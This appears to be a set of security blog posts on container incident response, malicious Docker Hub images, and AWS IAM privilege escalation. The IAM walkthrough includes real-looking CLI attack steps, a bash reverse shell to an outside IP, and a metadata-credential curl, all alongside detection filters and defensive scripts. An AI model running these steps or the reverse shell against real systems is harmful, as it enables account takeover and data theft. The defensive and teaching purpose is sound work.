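    return sorted(
        merged, key=lambda event: datetime.fromisoformat(event["timestamp"])
    )


# Hypothetical, already-normalized events from two tools.
falco_events = [
    {"timestamp": "2023-02-01T10:05:00+00:00", "source": "falco",
     "message": "Terminal shell in container"},
]
audit_events = [
    {"timestamp": "2023-02-01T10:04:30+00:00", "source": "k8s-audit",
     "message": "pods/exec requested"},
    {"timestamp": "2023-02-01T10:06:10+00:00", "source": "k8s-audit",
     "message": "secret read"},
]

for event in build_timeline(falco_events, audit_events):
    print(event["timestamp"], event["source"], event["message"])
```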

Here are some open source tools you may want to consider:

Container runtime security:
- Falco + Falcosidekick (CNCF Incubated)
Monitoring system:
- Prometheus (CNCF graduated)
Logging solution:
- Fluent Bit/Fluentd (CNCF graduated)
Log management platform:
- ELK Stack, OpenSearch, etc.

Step 2 – Detection & Analysis

The main purposes of this phase are to understand whether the incident actually happened and analyze its nature. These are not easy tasks. This isn’t the time to eradicate the incident yet.

In this phase, we typically check alerts and events generated by the tools mentioned before to see if there are Indicators of Compromise (IoCs), malicious behaviors, or suspicious activities that could point to a possible compromise. To do this, you need to survey the logs collected over time, looking for anything that might be suspicious, from application logs to container orchestrator or cloud logs. You may also want to monitor the resources you have in place, comparing them with planned or expected resources, so that you can distinguish anomalies and spikes from average loads.

All the information gathered through detection, logging, and alarm notification tools must then be analyzed to assess whether or not any of this may have been caused by a real incident.

Step 3 – Containment, Eradication, and Recovery

At this point, you already know that the analysis conducted in the previous step revealed a real breach and that something has occurred. You have to take all the required actions.

If you don’t know what the root cause was, then you should apply all the available mitigations. But before doing this, consider that any delayed containment strategy is dangerous because an attacker could escalate unauthorized access or compromise other systems.

Here are some tools you can use in this phase for containers:

docker/ctr/crictl/nerdctl/podman: To interact with the involved container engine.
kubectl: To communicate with the kube-apiserver.
docker-explorer/container-explorer (by Google): Open source projects that can do offline forensic analysis on a snapshotted volume.
container-diff (by Google): A tool for analyzing and comparing container images. It allows you to detect any changes within an image.
cloud-forensics-utils: An open source project that provides tools to be used by forensics teams to collect evidence from cloud platforms. Currently, Google Cloud Platform, Microsoft Azure, and Amazon Web Services are supported.

Containment

The main goal is to isolate the attack by assessing which resources have been impacted and taking actions to quarantine the impacted pod/container.

During this phase, it is also important to collect and store all evidence of the attack. For example:

Snapshot the worker node volume where the impacted pod/container was scheduled (manually from your cloud provider console or with tools that can automate this step, like cloud-forensics-utils).
Commit and push the infected container for further analysis.
If possible, checkpoint the container (best option).
If possible, use ephemeral containers for live investigation of distroless containers.

Eradication

Once the threat has been sufficiently contained, we now need to eradicate the attack. In other words, at this stage it is necessary to remove malware and threats that have been introduced during the incident, and also anything that might have granted attackers persistence or privilege escalation in the affected environment. In addition, it is crucial to identify which entry points were exploited during the breach, or what additional paths and permissions might have been exploited by attackers, in order to adopt the necessary remediation techniques.

For this reason, before proceeding with the eradication step, it is critical to understand how far the attack has spread.

In container environments where resources are shared, this is a very tricky task that requires specific knowledge of what to look at. Here are some points to focus on:

Check whether the affected pod was designed and deployed with sensitive mounts, or excessive privileges or capabilities. If so, there may have been pod escaping or access to host privileged information.
Monitor the Kubernetes audit logs with runtime tools, such as Falco, to detect any unwanted actions in the cluster. Examples include the creation of new clusterroles/pods in the cluster, reading secrets, and so on.
If the cluster is hosted in the cloud, inspect the cloud logs and monitor for any lateral movement attempts. Sometimes, impacted pods may leverage the cloud instance metadata service (IMDS) to access sensitive data and try to escalate privileges inside the cloud account. This could cause damage to all of your cloud infrastructure.
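The first check in the list above can be partly automated. The following Python sketch walks a pod manifest, loaded as a dictionary, and reports settings that commonly make container escapes easier. It is an illustrative helper, not a complete audit: the function name and the sample pod are hypothetical, and only a handful of standard Kubernetes fields (hostPID, hostNetwork, hostIPC, hostPath volumes, privileged, added capabilities) are inspected.

```python
def risky_pod_settings(pod):
    """Return a list of findings for a pod manifest given as a dict."""
    findings = []
    spec = pod.get("spec", {})

    # Host namespaces shared with the pod.
    for flag in ("hostPID", "hostNetwork", "hostIPC"):
        if spec.get(flag):
            findings.append(f"{flag} is enabled")

    # Volumes that expose the node filesystem.
    for volume in spec.get("volumes", []):
        if "hostPath" in volume:
            findings.append(f"hostPath mount: {volume['hostPath'].get('path')}")

    # Per-container privileges and capabilities.
    for container in spec.get("containers", []):
        ctx = container.get("securityContext", {})
        name = container.get("name", "<unnamed>")
        if ctx.get("privileged"):
            findings.append(f"container {name} is privileged")
        for cap in ctx.get("capabilities", {}).get("add", []):
            findings.append(f"container {name} adds capability {cap}")
    return findings


# Hypothetical manifest of the affected pod.
affected_pod = {
    "spec": {
        "hostPID": True,
        "volumes": [{"name": "sock", "hostPath": {"path": "/var/run/docker.sock"}}],
        "containers": [
            {
                "name": "app",
                "securityContext": {
                    "privileged": True,
                    "capabilities": {"add": ["SYS_ADMIN"]},
                },
            }
        ],
    }
}
pod_findings = risky_pod_settings(affected_pod)
```

An empty result does not prove the pod was safe; it only means none of these specific settings were present.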

The last action is to fix the misconfiguration or patch the vulnerability used by the attacker to get into your environment. If a fix isn’t possible, it’s important to find the right mitigation.

Recovery

At the recovery stage, any production systems affected by a threat will be brought back online. This includes any data recovery or restoration efforts that need to take place in order to bring systems and services to normal operations.

In this stage, it is also required to implement a permanent fix of the previously identified entry points. This might include patching and reconfiguring systems and application architecture, or rebuilding systems for production environments. The main goal is to eliminate the entry point(s) that the threat actor used to obtain access to the environment, and to prevent similar incidents in the future.

If a fix isn’t possible, it’s important to find the right mitigation techniques in order to reduce the attack surface and take measures to respond to future incidents. For example, you may want to delete the affected workload or run a playbook of actions if malicious executions/exploits are detected at runtime.

Step 4 – Post-Incident Activity

We are now at the last step of our incident response plan: post-incident activities. We took all the actions needed to contain and eradicate the threat, and the environment has recovered and is working as normal.

Yes, the incident happened, but we should take this as an opportunity to do better in the future.

It’s time to analyze what happened, what worked, what didn’t work, and why it didn’t work. The output of these post-incident activities should be used to update our incident response plan accordingly, to be sure to avoid the same incident in the future.

Conclusion

Nowadays, performing DFIR in Kubernetes or in containers is much more complicated than it traditionally was in other production environments. Containers are ephemeral, and even though they are built to run specific workloads, performing DFIR on them can be complex.

Logging all the necessary information, enforcing detection mechanisms, and adopting the right tools might help the incident response and forensics team to identify real breaches and gather all the evidence needed to assess the impact such incidents may have had in production environments.

Do you want to know more about DFIR?

The post CSI Container: Can you DFIR it? appeared first on Sysdig.

Exploiting IAM security misconfigurations

Stefano Chierici — Tue, 20 Dec 2022 16:30:00 +0000

These three IAM security misconfiguration scenarios are rather common. Discover how they can be exploited, but also how easy it is to detect and correct them.

Identity and access management (IAM) misconfigurations are one of the most common concerns in cloud security. Over the last few years, we have seen how these security holes put organizations at increased risk of experiencing serious attacks on their Cloud accounts.

To some, cloud environments might look like safe places where security is set by default. However, the truth is that security follows a shared responsibility model. For example, you are in charge of securing AWS console access.

But what if your users or roles are misconfigured?

Attackers can use those misconfigurations to gain the keys to the kingdom, accessing your environment and causing serious damage. In scenarios where attackers are already in, misconfigurations can help them perform cloud lateral movement, exfiltrate sensitive data, or use the account for their own purposes, like crypto mining.

In this article, we put security best practices and building a strong CNAPP aside and have some fun focusing our attention on some real-world scenarios of IAM security misconfigurations. We’ll showcase how it would be possible for an attacker to use those IAM misconfigurations and create serious hassles.

Why IAM security misconfigurations are a big deal

AWS Identity and Access Management (IAM) enables you to manage access to AWS services and resources securely. Using IAM, you can create and granularly manage AWS users and groups, and use permissions to allow and deny their access to AWS resources.

Given what IAM does, it is clearly a piece of our infrastructure we need to focus on. If this service is misconfigured, users or groups might cause huge damage to your infrastructure.

Due to the fine granularity of permissions available in cloud environments, applying the least privilege concept, that is, carefully granting exactly what a user needs to perform their tasks, is absolutely fundamental. A single misconfigured privilege could let an attacker escalate privileges inside the environment.

It’s also important to highlight that it’s often not just the single permission that could allow the user to perform unwanted action, but the combination of this single misconfigured permission with all the others already owned by the user. That’s why even a little misconfiguration might be a big deal for the entire account.
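To make the point about combinations concrete, here is a small Python sketch that checks a user's effective set of actions against a few risky combinations. The three combinations are the ones explored in this article's scenarios; the labels, the function name, and the sample action lists are made up for illustration, and the check uses exact string matching, so wildcards such as iam:* would need extra handling.

```python
# Each entry maps a descriptive label to the set of actions that, when held
# together, open a privilege escalation path. This list is intentionally
# short; a real review would cover many more combinations.
RISKY_COMBINATIONS = {
    "new policy version": {"iam:CreatePolicyVersion"},
    "trust policy rewrite": {"iam:UpdateAssumeRolePolicy", "sts:AssumeRole"},
    "role passed to new instance": {"iam:PassRole", "ec2:RunInstances"},
}


def risky_paths(granted_actions):
    """Return the labels of all combinations fully covered by the actions."""
    granted = set(granted_actions)
    return sorted(
        label
        for label, needed in RISKY_COMBINATIONS.items()
        if needed <= granted  # subset test: every needed action is granted
    )


# Hypothetical effective permissions for two users.
dev_user = ["ec2:RunInstances", "iam:PassRole", "s3:GetObject"]
ops_user = ["ec2:RunInstances", "s3:GetObject"]
```

Here risky_paths(dev_user) reports the instance path, while ops_user, who holds only one half of the pair, is not flagged. That is exactly why each permission has to be reviewed in the context of everything else the user already owns.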

Let’s dive deep into real-world scenarios, taking a closer look at three misconfigurations in AWS to understand the huge impact they can have on your environment.

IAM security misconfiguration scenarios

Scenario #1: A user can create a new policy version

In this scenario, an attacker who found valid credentials in Pastebin is able to access the cloud environment. It turns out that the compromised user has permission to create a new version of one of their IAM policies.

This allows the adversary to define their own custom permissions and gain full administrator access to the AWS account.

The attacker was able to access the cloud environment using the compromised user mallory.

aws sts get-caller-identity

Looking at the policies attached to the user mallory, we can see the IAM_Policy policy.

aws iam list-attached-user-policies --user-name mallory

If we use the method get-policy, it’s possible to extract further information regarding the policy.

aws iam get-policy --policy-arn arn:aws:iam::ARN-TARGET:policy/IAM_Policy

Checking the permissions granted by this policy, we can find the iam:CreatePolicyVersion permission attached. With this privilege, it’s possible to update a managed policy by creating a new policy version.

aws iam get-policy-version --policy-arn arn:aws:iam::ARN-TARGET:policy/IAM_Policy --version-id v1

The attacker can use the privilege, along with the following JSON file, to create a new policy version that allows every action on every resource. This grants the same level of access as the AWS managed policy AdministratorAccess, giving full access to the environment:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": "*",
            "Resource": "*"
        }
    ]
}
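From the defender's side, a policy document like the one above is easy to spot programmatically. The Python sketch below flags any Allow statement that pairs Action "*" with Resource "*". It is a deliberately narrow check written for illustration: the function names are hypothetical, and conditions, NotAction, and service-level wildcards such as iam:* are not evaluated.

```python
import json


def _as_list(value):
    """IAM accepts either a single item or a list in these fields."""
    return value if isinstance(value, list) else [value]


def grants_full_access(policy_document):
    """Return True if any Allow statement pairs Action "*" with Resource "*"."""
    policy = json.loads(policy_document)
    for statement in _as_list(policy.get("Statement", [])):
        if statement.get("Effect") != "Allow":
            continue
        actions = _as_list(statement.get("Action", []))
        resources = _as_list(statement.get("Resource", []))
        if "*" in actions and "*" in resources:
            return True
    return False


# The privesc.json document from this scenario.
privesc = """
{
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": "*", "Resource": "*"}
    ]
}
"""

# A hypothetical, narrower policy for comparison.
limited = """
{
    "Version": "2012-10-17",
    "Statement": {"Effect": "Allow", "Action": ["s3:GetObject"], "Resource": "*"}
}
"""
```

Running grants_full_access on every version of every customer managed policy is one simple way to notice that a policy has silently become administrator-equivalent.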

When creating the new policy version, the attacker needs to set it as the default one for it to take effect.

To do so, they need to have the iam:SetDefaultPolicyVersion permission.

However, when creating a new policy version, it is possible to use the --set-as-default flag that will automatically create it as the new default version without requiring that iam:SetDefaultPolicyVersion permission.

Magic! 🪄

With the following command, the attacker is able to create a new policy version and escalate their privileges inside the environment to administrator.

aws iam create-policy-version --policy-arn arn:aws:iam::ARN-TARGET:policy/IAM_Policy --policy-document file://privesc.json --set-as-default

By checking the policy using get-policy, as we did before, we can see that the value in defaultVersionId changed.

aws iam get-policy --policy-arn arn:aws:iam::ARN-TARGET:policy/IAM_Policy

If we now check the permissions granted by the new policy version, we can see that we successfully escalated the privileges to full administrator access.

aws iam get-policy-version --policy-arn arn:aws:iam::ARN-TARGET:policy/IAM_Policy --version-id v2

As we have seen in this real-world scenario, a single misconfigured IAM privilege, iam:CreatePolicyVersion in this case, could lead an attacker to a total compromise of a cloud account, and potentially of other connected accounts.

Scenario #2: A user can update the AssumeRolePolicyDocument of a role

In this scenario, an attacker was able to get valid AWS credentials to log into the account by phishing an internal user. The compromised user has misconfigured IAM policies attached, letting them edit the assume role policy (trust policy) of any existing role.

The user could go from minimal privileges to full control over EC2s inside the account.

In this case, the compromised user is operator.

aws sts get-caller-identity

Let’s fish around to check if the user is part of any groups.

aws iam list-groups-for-user --user-name operator

We were lucky! In this case, the user is part of the devOps group.

During the information gathering phase, the attacker checks the policies attached and can see there is one policy called dev-AssumeRole, which sounds interesting.

aws iam list-attached-group-policies --group-name devOps

The AssumeRole policy attached to the group allows a user to assume all the roles.

aws iam get-policy-version --policy-arn arn:aws:iam::ARN-TARGET:policy/assumeRole --version-id v1

Checking inline policies, the compromised user also has a policy named IAM_Policy.

aws iam list-user-policies --user-name operator

It is easy to see that this IAM permission is either a misconfiguration or a permission that was granted for a specific task and not removed afterward.

Checking the actions contained in the policy, we can see the iam:UpdateAssumeRolePolicy permission attached.

aws iam get-user-policy --policy-name IAM_policy --user-name operator

With the discovered IAM permission, the user is able to:

Edit the trust policy of the roles they can assume.
Elevate their privileges inside the account.

Using the following command, the attacker can easily escalate the privileges:

aws iam update-assume-role-policy --role-name dev-EC2Full --policy-document file://privesc.json

In the privesc.json file used in the command above, the attacker added the user ARN to the dev-EC2Full role trust policy:

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::7208********:user/operator"
      },
      "Action": "sts:AssumeRole"
    }
  ]
}

The attacker can now proceed, impersonating the new role using assume-role. It returns the temporary security credentials that can be used to access the cloud environment with the new role.

aws sts assume-role --role-arn "arn:aws:iam::ARN-TARGET:role/dev-EC2Full" --role-session-name AWSCLI-Session

😲Surprise!

After importing the newly obtained keys locally and checking the identity we are currently logged in with, we can confirm that the attacker successfully escalated their privileges inside the environment. Of course, the same approach could be used to reach any other role, including those with AWS managed policies attached.

aws sts get-caller-identity

This would give the attacker full privileges over EC2s, with the chance to spawn instances for their own purposes.

In this real-world scenario, a misconfigured iam:UpdateAssumeRolePolicy privilege could give an attacker full control over EC2 inside the cloud account. For an attacker, that means the chance to create new instances and/or destroy what is already in place, causing serious damage to the company.
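One way to review the outcome of a change like this is to list which IAM users a role's trust policy allows to assume it. The Python sketch below does that for a trust policy loaded as a dictionary. The function name is hypothetical, and the idea that a user ARN in the trust policy of a role such as dev-EC2Full deserves a second look is an assumption about how such a role would normally be configured, not a rule stated by AWS.

```python
def user_principals(trust_policy):
    """Return the IAM user ARNs that a trust policy allows to assume the role."""
    users = []
    statements = trust_policy.get("Statement", [])
    if isinstance(statements, dict):
        statements = [statements]

    for statement in statements:
        if statement.get("Effect") != "Allow":
            continue
        actions = statement.get("Action", [])
        if isinstance(actions, str):
            actions = [actions]
        if "sts:AssumeRole" not in actions:
            continue

        principal = statement.get("Principal", {})
        if not isinstance(principal, dict):
            # For example the wildcard principal "*"; not handled in this sketch.
            continue
        aws_principals = principal.get("AWS", [])
        if isinstance(aws_principals, str):
            aws_principals = [aws_principals]
        users.extend(arn for arn in aws_principals if ":user/" in arn)
    return users


# The trust policy written by the attacker in this scenario.
modified_trust = {
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": {"AWS": "arn:aws:iam::7208********:user/operator"},
            "Action": "sts:AssumeRole",
        }
    ],
}

# A hypothetical trust policy that only trusts the EC2 service.
service_only_trust = {
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": {"Service": "ec2.amazonaws.com"},
            "Action": "sts:AssumeRole",
        }
    ],
}
```

Comparing the output before and after a change makes it obvious when a new user has been added to a role's trust relationship.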

Scenario #3: A user can create EC2 instances, and pass the role

In this scenario, we can see how the combination of IAM and EC2 privileges could lead to an attacker escalating the privileges from zero to hero into the account.

The attacker was able to get valid AWS credentials via a spear phishing attack. The compromised cloud user has the permissions to run EC2 instances, as well as the ability to pass roles.

Using those privileges, the adversary is able to escalate their privileges inside the account, run an EC2 instance, and exfiltrate information stored in S3 buckets.

As we can see from the image below, the compromised user is part of the devOps group.

aws iam list-groups-for-user --user-name operator

Checking the permissions attached to the group, we see two policies attached:

aws iam list-attached-group-policies --group-name devOps

Focusing on the dev-Ops policy, we can see it has the iam:PassRole and ec2:RunInstances permissions attached.

aws iam get-policy-version --policy-arn arn:aws:iam::ARN-TARGET:policy/dev-Ops --version-id v1

The combination of these two privileges lets the misconfigured user create a new EC2 instance and pass an existing EC2 instance profile/service role to it. Not only that, but they will also have operating system access to the instance.

🤯

As we can see below, by running the run-instances command, the user is able to launch a new instance using other information gathered in the account. Using the --iam-instance-profile flag, it’s possible to pass an instance profile directly during instance creation without needing further permissions.

Looking through the available roles in the cloud account, the devOps-S3Full role looks interesting and can be used by the EC2 services.

aws ec2 run-instances --image-id ami-a4dc46db --instance-type t2.micro --iam-instance-profile Name="devOps-S3Full" --user-data file://revshell.sh

The revshell.sh file contains a script that opens a bash reverse shell, reported in the code below. It is worth noting that to create the instance, the attacker doesn’t need any SSH keys or security groups.

#!/bin/bash
bash -i >& /dev/tcp/107.21.43.88/443 0>&1

Once the machine is launched, the script is executed and the attacker is able to get a running shell on the machine with the root user. In this way, the attacker has full control over the machine to execute whatever they want, as we can see in the image below.

As we have seen before, with the PassRole privilege, the user can pass whatever role they want to the created machine.

In this case, the attacker passes the devOps-S3Full role, which grants full S3 bucket access, to the instance.

curl http://169.254.169.254/2021-07-15/meta-data/identity-credentials/ec2/security-credentials/ec2-instance

The attacker can then log into the instance and request the associated AWS keys from the EC2 instance metadata. As seen before, the attacker can import the temporary credentials and use them to log into the cloud account with the role associated with the EC2 instance created before.

aws sts get-caller-identity

Once logged in, the adversary has full control over the S3 buckets, with the chance to exfiltrate sensitive information or destroy all the files found in the available buckets.

In this case, the attacker found interesting buckets, some containing credentials and others related to the Kubernetes environment. Deleting those files might cause serious damage to the running environment.

aws s3 ls

In this attack scenario, we have seen how an attacker with a combination of two security misconfigurations was able to access the set of permissions that the instance profile/role has, which could range from no privilege escalation to full administrator access of the AWS account.

Detecting IAM security misconfigurations

All the attacks we have seen so far were possible due to an AWS security misconfiguration somewhere in the environment.

Those use cases may sound silly or unlikely, but are you sure you have a clear picture and really know what permissions are applied in your environment?

Even more importantly, how can we also track and validate the changes applied?

Detecting malicious cloud changes

Fortunately, when the attacker uses the privileges attached to the compromised user, they are going to leave very recognizable tracks.

Also, when someone is performing changes in the infrastructure, it will leave tracks like “which action has been performed and over what type of service.”

AWS provides strong capabilities to understand what is going on in the environment. CloudTrail records actions taken by a user, role, or an AWS service from AWS Management Console, AWS Command Line Interface, and AWS SDKs and APIs.

Through CloudTrail, we can see the operator user calling the UpdateAssumeRolePolicy, along with the target role and other context information:

Using another AWS feature, CloudWatch, it’s possible to create alerts based on CloudTrail events.

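In this case, let’s create an alert that fires when someone changes the IAM configuration, using one of the following filters. The first matches a narrower set of event names, while the second is broader: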

{ ( ($.eventSource = "iam.amazonaws.com") && (($.eventName = "Put*Policy") || ($.eventName = "Attach*") || ($.eventName = "Detach*") || ($.eventName = "Create*") || ($.eventName = "Update*") || ($.eventName = "Upload*") || ($.eventName = "Delete*") || ($.eventName = "Remove*") || ($.eventName = "Set*")) ) }
{ ( ($.eventSource = "iam.amazonaws.com") && (($.eventName = "Add*") || ($.eventName = "Attach*") || ($.eventName = "Change*") || ($.eventName = "Create*") || ($.eventName = "Deactivate*") || ($.eventName = "Delete*") || ($.eventName = "Detach*") || ($.eventName = "Enable*") || ($.eventName = "Put*") || ($.eventName = "Remove*") || ($.eventName = "Set*") || ($.eventName = "Update*") || ($.eventName = "Upload*")) ) }
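To test this kind of filter against exported CloudTrail records before wiring up an alert, the same logic can be approximated offline. The Python sketch below mirrors the event name prefixes of the second filter using shell-style wildcard matching. It is only an approximation for experimentation: the function name and sample events are hypothetical, and CloudWatch evaluates its own filter syntax, which this code does not reproduce exactly.

```python
from fnmatch import fnmatchcase

# Event name patterns taken from the broader of the two filters above.
IAM_CHANGE_PATTERNS = [
    "Add*", "Attach*", "Change*", "Create*", "Deactivate*", "Delete*",
    "Detach*", "Enable*", "Put*", "Remove*", "Set*", "Update*", "Upload*",
]


def is_iam_change(event):
    """Return True if a CloudTrail record looks like an IAM change."""
    if event.get("eventSource") != "iam.amazonaws.com":
        return False
    name = event.get("eventName", "")
    # fnmatchcase performs case-sensitive wildcard matching.
    return any(fnmatchcase(name, pattern) for pattern in IAM_CHANGE_PATTERNS)


# Hypothetical, heavily trimmed CloudTrail records.
sample_events = [
    {"eventSource": "iam.amazonaws.com", "eventName": "UpdateAssumeRolePolicy"},
    {"eventSource": "iam.amazonaws.com", "eventName": "CreatePolicyVersion"},
    {"eventSource": "iam.amazonaws.com", "eventName": "ListUsers"},
    {"eventSource": "ec2.amazonaws.com", "eventName": "RunInstances"},
]
matched = [e["eventName"] for e in sample_events if is_iam_change(e)]
```

Note that the RunInstances call from the third scenario is not an IAM event, so a filter scoped to iam.amazonaws.com would not catch it; detecting that scenario needs a separate rule on EC2 events.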

Why is detecting IAM security misconfigurations hard to do?

The difficulty in detecting attackers who have compromised a misconfigured user is that their actions aren’t actually malicious behavior per se.

Running instances or updating an assume role policy document are legitimate actions if done by the right people. So how can we know if a user is really authorized to perform a specific action and proactively take measures before something bad happens?

To answer this question, you need to have a clear view of your environment and AWS security best practices applied. Having best practices applied for Cloud IAM comes in handy when you need to assess the privileges attached to each user or group. For example, if you see the dev group has attached policies related to IAM and you applied the least privilege concept in your environment, you can easily understand that there is something wrong in place for this specific group.

However, applying best practices isn’t enough. To be sure to enforce the best practices and proactively take remediation action, you need to know what is in place in your environment. Of course, it’s not that easy to have a nice and clear picture of which policies and roles are applied to a group, user, or service account.

You have to rely on security tools that continuously monitor for anomalous activity in the cloud and generate security events from it. In the case of AWS, this means gathering traces from CloudTrail events, among other sources. With the right tools, you can easily assess and strengthen your cloud security.

Finally, we can use Falco, an open source runtime security threat detection and response engine, to detect threats at runtime by observing the behavior of your applications and containers running on cloud environments. Falco extends support for threat detection across multiple cloud environments via Falco Plugins. By streaming logs from the cloud provider to Falco, instead of installing the Falco agent in the cloud environment, we have the deep visibility required to perform posture management.

Conclusion

The real-life scenario attacks we presented show how it’s possible for an adversary to use IAM security misconfigurations to gain high privileges inside a cloud environment.

Such attacks can start with valid credentials found online, or obtained from tricking users via phishing, and may proceed with further privilege escalation to take control over the account.

By leveraging AWS features like CloudTrail and CloudWatch, among others, it’s possible to get alerted when changes are applied in your environment, triggering an automatic response.

Check out our “Cloud Infrastructure Entitlements Management (CIEM) with Sysdig Secure” article to discover how easy it is to detect each attack scenario with Sysdig Secure for cloud.

The Sysdig Secure DevOps Platform provides the visibility you need to confidently run containers, Kubernetes, and cloud. Built on an open-source stack with SaaS delivery, it is radically simple to run and scale.

You’ll be set in only a few minutes. Try it today!

The post Exploiting IAM security misconfigurations appeared first on Sysdig.

Analysis on Docker Hub malicious images: Attacks through public container images

Stefano Chierici — Wed, 23 Nov 2022 16:30:00 +0000

Supply Chain attacks are not new, but this past year they received much more attention due to high profile vulnerabilities in popular dependencies. Generally, the focus has been on the dependency attack vector. This is when source code of a dependency or product is modified by a malicious actor in order to compromise anyone who uses it in their own software.

The 2020 attack against SolarWinds software is one of the most well-known recent examples of this technique, where attackers hid backdoors in the product itself.

Source code dependencies are not the only attack vector that can be used to conduct an offensive supply chain operation. Containers have become a hugely popular attack vector in recent years. Since container images are designed to be portable, it is very easy for one developer to share a container with another individual.

There are multiple open source projects available providing the source code to deploy a container registry, or free access container registries for developers to share container images. Docker Hub is the most popular free and public-facing container registry. It houses pre-made container images, which provide the great advantage of having all required software installed and configured. These features make it very tempting for developers to leverage these containers as it can save a significant amount of time and effort.

Attackers understand these benefits and can create images that have malicious payloads built in.

A user will then run the “docker pull” command and have the container up and running very quickly. The attacker’s misconfigurations and/or malware are now installed on the user’s machine or on a cloud instance where the user is deploying their workloads. A Docker Hub download and installation is opaque; therefore, users should inspect the manifest (i.e., Dockerfile) prior to download and ensure that the source is legitimate and the image is clean.

The Sysdig Threat Research Team performed an analysis of over 250,000 Linux images in order to understand what kind of malicious payloads are hiding in the container images on Docker Hub.

This article is part of the 2022 Sysdig Cloud-Native Threat Report.

Docker Hub

Docker Hub is a cloud-based image repository in which anyone in the world can download, create, store, and deploy Docker container images for free. It provides access to public open-source image repositories, and each user can create their own private repositories to store personal images.

Docker Hub provides official images which are reviewed and published by the Docker Library Project, making sure that best practices are followed and providing clear documentation and regular updates. In addition, Docker Hub enables Independent Software Vendors (ISVs) via The Docker Verified Publisher Program. Development tool vendors in this program can distribute trusted Dockerized content through Docker Hub with images signed by Verified Publisher, reducing a user’s chance of downloading malicious content.

Looking at statistics from the 2022 Sysdig Cloud-Native Security and Usage Report, 61% of all images pulled come from public repositories, an increase of 15% from 2021. This means the flexibility and other features provided by public repositories are well appreciated by users, but at the same time, there is an increased risk of exposure to malicious images.

Typosquatting, Cryptominers, and Keys

The Sysdig Threat Research Team built a classifier to extract and collect information about recently updated images in Docker Hub to determine if those images contained anything anomalous or malicious within the image layers.

The team extracted information like secrets, IPs, and URLs to evaluate if a specific image might be malicious. To perform all of these operations across a large number of images, the extraction and validation process was automated for scalability. This approach allowed for the rapid analysis of all the extracted information for hundreds of thousands of images. Sysdig TRT used multiple open source tools and services to determine if IPs and URLs were malicious or not.
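To give a rough idea of what this kind of extraction can look like, the Python sketch below pulls IPv4 addresses, URLs, and two common secret patterns out of layer text with regular expressions. This is not the Sysdig TRT classifier: the patterns, the function name, and the sample layer are assumptions chosen for illustration, the IP pattern does not validate octet ranges, and the reputation lookup that follows extraction is left out.

```python
import re

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
URL_RE = re.compile(r"\b[a-z][a-z0-9+.-]*://[^\s\"']+", re.IGNORECASE)
# Access key IDs start with a known prefix followed by 16 characters.
AWS_KEY_ID_RE = re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b")
# PEM header used by RSA, EC, OpenSSH, and generic private keys.
PRIVATE_KEY_RE = re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----")


def extract_indicators(layer_text):
    """Collect candidate indicators from the text of an image layer."""
    return {
        "ips": sorted(set(IPV4_RE.findall(layer_text))),
        "urls": sorted(set(URL_RE.findall(layer_text))),
        "aws_key_ids": sorted(set(AWS_KEY_ID_RE.findall(layer_text))),
        "has_private_key": bool(PRIVATE_KEY_RE.search(layer_text)),
    }


# Hypothetical layer content; the IP is from a documentation range and the
# key ID is the placeholder used in AWS documentation.
sample_layer = (
    "RUN curl http://203.0.113.7/setup.sh | sh\n"
    "ENV AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE\n"
)
indicators = extract_indicators(sample_layer)
```

Everything collected this way is only a candidate: an address or URL still has to be checked against threat intelligence sources, and a key has to be confirmed as real before the image is labeled malicious.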

During the analysis, over 250,000 Linux images were analyzed over several months, excluding the official images and verified images. The focus of the investigation was on public images uploaded by users around the world.

Dangerous Images in Public Registries

The Sysdig Threat Research Team collected malicious images based on several categories, as shown below. The analysis focused on two main categories: malicious IPs or domains, and secrets. Both can represent a threat for people downloading and deploying images publicly available in Docker Hub, exposing their environment to high risks.

The following graphic classifies all 1,652 images that were identified as malicious by type of nefarious content included in their layers.

As expected, cryptomining images are the most common malicious image type. However, embedded secrets in layers are the second most prevalent, which highlights the persistent challenges of secrets management. Secrets can be embedded in an image due to unintentionally poor coding practices or this could be done intentionally by a threat actor. By embedding an SSH key or an API key into the container, the attacker can gain access once the container is deployed. To prevent accidental leakage of credentials, sensitive data scanning tools can alert users as part of the development cycle.

The images that have secrets embedded in their layers represent a large portion of the malicious images. Sysdig TRT divided those images into subcategories based on the type of leaked secret, as shown in the following graph.

Sysdig TRT also included public keys in the SSH keys category because they are most likely deployed for illegitimate uses when embedded in container images. For instance, uploading a public key to a remote server allows the owners of the corresponding private key to open a shell and run commands via SSH, similar to implanting a backdoor.

The secrets belonging to the other categories could allow anyone to authenticate to different services and platforms, since they are publicly accessible in the layers.

Malicious Images Disguised as Legitimate Software

During the research in Docker Hub, Sysdig TRT found images named to look like popular open source software in order to trick users into downloading and deploying them. This practice is known as typosquatting: the images pretend to be the legitimate, official ones while hiding something nefarious within their layers.
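A simple guard against this kind of disguise is to compare the repository part of an image name with the software you expect and to check who published it. The Python sketch below does this with a string similarity ratio. The mapping of software names to trusted namespaces is entirely hypothetical and must be filled in from your own list of approved publishers; the function name and the 0.8 threshold are also assumptions.

```python
from difflib import SequenceMatcher

# Hypothetical allow list: software name -> namespace you trust to publish it.
TRUSTED_PUBLISHERS = {
    "liferay": "liferay",
    "nginx": "library",
}


def disguised_as(image, trusted=TRUSTED_PUBLISHERS, threshold=0.8):
    """Return the software an image appears to imitate, or None.

    `image` is expected in "namespace/repository" form.
    """
    namespace, _, repository = image.lower().rpartition("/")
    for software, trusted_namespace in trusted.items():
        similarity = SequenceMatcher(None, repository, software).ratio()
        # Same or near-identical name, but from a publisher we do not trust.
        if similarity >= threshold and namespace != trusted_namespace:
            return software
    return None
```

With this mapping, disguised_as("ynprpagamentitk/liferay") returns "liferay" because the name matches but the publisher does not, while disguised_as("library/nginx") returns None.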

The following images are named as legitimate images that provide common services but instead are hiding cryptocurrency miners. A careless user may accidentally install one of these images instead of an official one they intended. Such mistakes most often occur when utilizing crowdsourced knowledge, like copying and pasting code or configurations from blogs or forums.

Malicious Images Impersonating Legitimate Software

